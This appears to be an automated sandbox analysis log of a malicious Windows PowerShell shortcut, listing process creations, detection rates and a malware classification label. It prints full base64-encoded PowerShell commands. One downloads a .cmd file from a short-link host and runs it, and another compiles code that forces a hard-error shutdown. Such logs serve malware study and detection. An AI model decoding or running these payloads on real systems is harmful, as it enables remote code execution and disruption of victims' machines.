Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEJump to behavior

System Summary

barindex
Performs an instant shutdown (NtRaiseHardError)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHard error raised: shutdownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 75_2_00007FFD34575B94 NtRaiseHardError,75_2_00007FFD34575B94
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 75_2_00007FFD345716C975_2_00007FFD345716C9
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3279
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3279Jump to behavior
Source: pbkjdvqy.dll.76.dr, X.csBase64 encoded string: 'RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw'
Source: classification engineClassification label: mal100.rans.bank.expl.evad.winLNK@131/13@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Windows PowerShell.lnkReversingLabs: Detection: 13%
Source: Windows PowerShell.lnkVirustotal: Detection: 19%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 97
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 99
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 102
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 103
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 105
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 106
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 107
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 108
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 115
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 118
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 120
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 121
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 122
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 65
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 66
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 67
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 72
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 79
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 80
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 81
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 82
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 86
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 50
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 51
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 52
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 53
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 57
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 123
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 63
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 58
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 46
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 97Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 99Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 102Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 103Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 105Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 106Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 107Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 108Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 115Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 118Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 120Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 121Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 122Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 65Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 66Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 67Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 72Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 79Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 80Jump to behavior
